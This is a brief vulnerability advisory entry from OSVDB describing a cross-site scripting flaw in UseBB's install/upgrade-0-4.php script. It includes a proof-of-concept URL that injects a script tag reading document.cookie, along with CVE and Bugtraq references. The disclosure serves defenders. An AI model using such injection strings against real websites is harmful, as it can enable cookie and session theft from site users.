UseBB install/upgrade-0-4.php PHP_SELF Variable XSS

2007-07-20T00:00:00
ID OSVDB:39008
Type osvdb
Reporter OSVDB
Modified 2007-07-20T00:00:00

Description

Manual Testing Notes

http://[target]/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>

References:

Related OSVDB ID: 39006 Related OSVDB ID: 39007 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-07/0224.html CVE-2007-3963 Bugtraq ID: 24990